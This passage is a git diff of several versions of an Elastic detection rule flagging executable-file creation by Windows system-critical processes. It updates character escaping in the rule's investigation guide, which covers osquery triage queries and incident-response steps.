Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json index 264be565ca6..b22677b8352 100644 --- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json index 0024671844e..43b37346ab9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json index e3694e14c84..eac01997354 100644 --- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json index 7f61a6178eb..cd04391bfe3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files 